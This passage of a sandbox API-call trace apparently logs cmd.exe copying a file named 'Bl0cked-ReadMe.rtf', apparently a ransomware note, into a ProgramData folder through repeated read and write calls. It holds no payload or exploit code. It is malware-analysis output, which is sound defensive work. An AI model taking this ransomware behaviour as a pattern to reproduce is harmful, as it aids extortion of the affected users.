returned 2 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f710, cchData=128 | out: lpLCData="0") returned 2 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f710, cchData=128 | out: lpLCData="0") returned 2 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f710, cchData=128 | out: lpLCData="1") returned 2 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, 
lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0205.496] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0205.497] GetConsoleTitleW (in: lpConsoleTitle=0x2408e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.497] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0205.497] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0205.497] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0205.497] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0205.498] _wcsicmp (_String1="type", _String2=")") returned 75 [0205.498] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0205.498] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0205.498] _wcsicmp 
(_String1="IF", _String2="type") returned -11 [0205.498] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0205.498] _wcsicmp (_String1="REM", _String2="type") returned -2 [0205.498] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0205.502] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.502] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.502] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.502] GetFileType (hFile=0x7) returned 0x2 [0205.502] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0205.502] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12f608 | out: lpMode=0x12f608) returned 1 [0205.502] _dup (_FileHandle=1) returned 3 [0205.503] _close (_FileHandle=1) returned 0 [0205.503] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0205.503] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\packag~1\\{e6e75~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x12f5d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0205.504] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0205.504] GetConsoleTitleW (in: lpConsoleTitle=0x12f408, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.504] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0205.504] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0205.505] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0205.505] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0205.505] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.505] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x12ef6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 
lpFindFileData=0x12ef6c) returned 0x240e80 [0205.506] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0205.506] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0205.506] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0205.506] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x12de78, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0205.506] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0205.506] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.506] GetFileType (hFile=0x54) returned 0x1 [0205.506] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.506] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x12ded0 | out: lpFileSizeHigh=0x12ded0*=0x0) returned 0x1632 [0205.506] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.506] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.506] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.506] ReadFile (in: hFile=0x54, lpBuffer=0x12ed08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12def8, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesRead=0x12def8*=0x200, lpOverlapped=0x0) returned 1 [0205.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.506] GetFileType (hFile=0x4c) returned 0x1 [0205.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.506] GetFileType (hFile=0x4c) returned 0x1 [0205.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.506] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesWritten=0x12deec*=0x50, 
lpOverlapped=0x0) returned 1 [0205.508] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.508] GetFileType (hFile=0x4c) returned 0x1 [0205.508] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.508] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed58*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.508] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.563] GetFileType (hFile=0x4c) returned 0x1 [0205.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.563] WriteFile (in: hFile=0x4c, lpBuffer=0x12eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eda8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.563] GetFileType (hFile=0x4c) returned 0x1 [0205.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.563] WriteFile (in: hFile=0x4c, lpBuffer=0x12edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12edf8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.563] GetFileType (hFile=0x4c) returned 0x1 [0205.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.563] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee48*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.563] GetFileType (hFile=0x4c) returned 0x1 [0205.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.563] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee98*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.563] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0205.563] GetFileType (hFile=0x4c) returned 0x1 [0205.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.563] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eee8*, lpNumberOfBytesWritten=0x12deec*=0x20, lpOverlapped=0x0) returned 1 [0205.563] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.564] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ded8 | out: lpNewFilePointer=0x0) returned 1 [0205.564] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.564] ReadFile (in: hFile=0x54, lpBuffer=0x12ed08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12def8, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesRead=0x12def8*=0x200, lpOverlapped=0x0) returned 1 [0205.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.564] GetFileType (hFile=0x4c) returned 0x1 [0205.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.564] GetFileType (hFile=0x4c) returned 0x1 [0205.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.564] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.564] GetFileType (hFile=0x4c) returned 0x1 [0205.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.564] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed58*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.564] GetFileType (hFile=0x4c) returned 0x1 [0205.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.564] WriteFile (in: hFile=0x4c, lpBuffer=0x12eda8*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eda8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.564] GetFileType (hFile=0x4c) returned 0x1 [0205.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.564] WriteFile (in: hFile=0x4c, lpBuffer=0x12edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12edf8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.564] GetFileType (hFile=0x4c) returned 0x1 [0205.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.564] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee48*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.564] GetFileType (hFile=0x4c) returned 0x1 [0205.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.564] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee98*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.565] GetFileType (hFile=0x4c) returned 0x1 [0205.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.565] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eee8*, lpNumberOfBytesWritten=0x12deec*=0x20, lpOverlapped=0x0) returned 1 [0205.565] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.565] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ded8 | out: lpNewFilePointer=0x0) returned 1 [0205.565] _get_osfhandle (_FileHandle=4) returned 
0x54 [0205.565] ReadFile (in: hFile=0x54, lpBuffer=0x12ed08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12def8, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesRead=0x12def8*=0x200, lpOverlapped=0x0) returned 1 [0205.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.565] GetFileType (hFile=0x4c) returned 0x1 [0205.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.565] GetFileType (hFile=0x4c) returned 0x1 [0205.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.565] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.565] GetFileType (hFile=0x4c) returned 0x1 [0205.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.565] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed58*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.565] GetFileType (hFile=0x4c) returned 0x1 [0205.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.565] WriteFile (in: hFile=0x4c, lpBuffer=0x12eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eda8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.565] GetFileType (hFile=0x4c) returned 0x1 [0205.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.565] WriteFile (in: hFile=0x4c, lpBuffer=0x12edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12edf8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.565] GetFileType (hFile=0x4c) 
returned 0x1 [0205.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.565] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee48*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] GetFileType (hFile=0x4c) returned 0x1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee98*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] GetFileType (hFile=0x4c) returned 0x1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eee8*, lpNumberOfBytesWritten=0x12deec*=0x20, lpOverlapped=0x0) returned 1 [0205.566] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.566] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ded8 | out: lpNewFilePointer=0x0) returned 1 [0205.566] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.566] ReadFile (in: hFile=0x54, lpBuffer=0x12ed08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12def8, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesRead=0x12def8*=0x200, lpOverlapped=0x0) returned 1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] GetFileType (hFile=0x4c) returned 0x1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] GetFileType (hFile=0x4c) returned 0x1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, 
lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] GetFileType (hFile=0x4c) returned 0x1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed58*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] GetFileType (hFile=0x4c) returned 0x1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] WriteFile (in: hFile=0x4c, lpBuffer=0x12eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eda8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] GetFileType (hFile=0x4c) returned 0x1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] WriteFile (in: hFile=0x4c, lpBuffer=0x12edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12edf8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] GetFileType (hFile=0x4c) returned 0x1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee48*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] GetFileType (hFile=0x4c) returned 0x1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee98*, lpNumberOfBytesWritten=0x12deec*=0x50, 
lpOverlapped=0x0) returned 1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] GetFileType (hFile=0x4c) returned 0x1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eee8*, lpNumberOfBytesWritten=0x12deec*=0x20, lpOverlapped=0x0) returned 1 [0205.567] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.567] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ded8 | out: lpNewFilePointer=0x0) returned 1 [0205.567] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.567] ReadFile (in: hFile=0x54, lpBuffer=0x12ed08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12def8, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesRead=0x12def8*=0x200, lpOverlapped=0x0) returned 1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] GetFileType (hFile=0x4c) returned 0x1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] GetFileType (hFile=0x4c) returned 0x1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] GetFileType (hFile=0x4c) returned 0x1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed58*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] GetFileType (hFile=0x4c) returned 0x1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] WriteFile (in: hFile=0x4c, 
lpBuffer=0x12eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eda8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] GetFileType (hFile=0x4c) returned 0x1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] WriteFile (in: hFile=0x4c, lpBuffer=0x12edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12edf8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] GetFileType (hFile=0x4c) returned 0x1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee48*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] GetFileType (hFile=0x4c) returned 0x1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee98*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] GetFileType (hFile=0x4c) returned 0x1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eee8*, lpNumberOfBytesWritten=0x12deec*=0x20, lpOverlapped=0x0) returned 1 [0205.568] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.568] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ded8 | out: lpNewFilePointer=0x0) returned 1 [0205.568] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0205.568] ReadFile (in: hFile=0x54, lpBuffer=0x12ed08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12def8, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesRead=0x12def8*=0x200, lpOverlapped=0x0) returned 1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] GetFileType (hFile=0x4c) returned 0x1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] GetFileType (hFile=0x4c) returned 0x1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] GetFileType (hFile=0x4c) returned 0x1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed58*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] GetFileType (hFile=0x4c) returned 0x1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] WriteFile (in: hFile=0x4c, lpBuffer=0x12eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eda8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] GetFileType (hFile=0x4c) returned 0x1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] WriteFile (in: hFile=0x4c, lpBuffer=0x12edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12edf8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] 
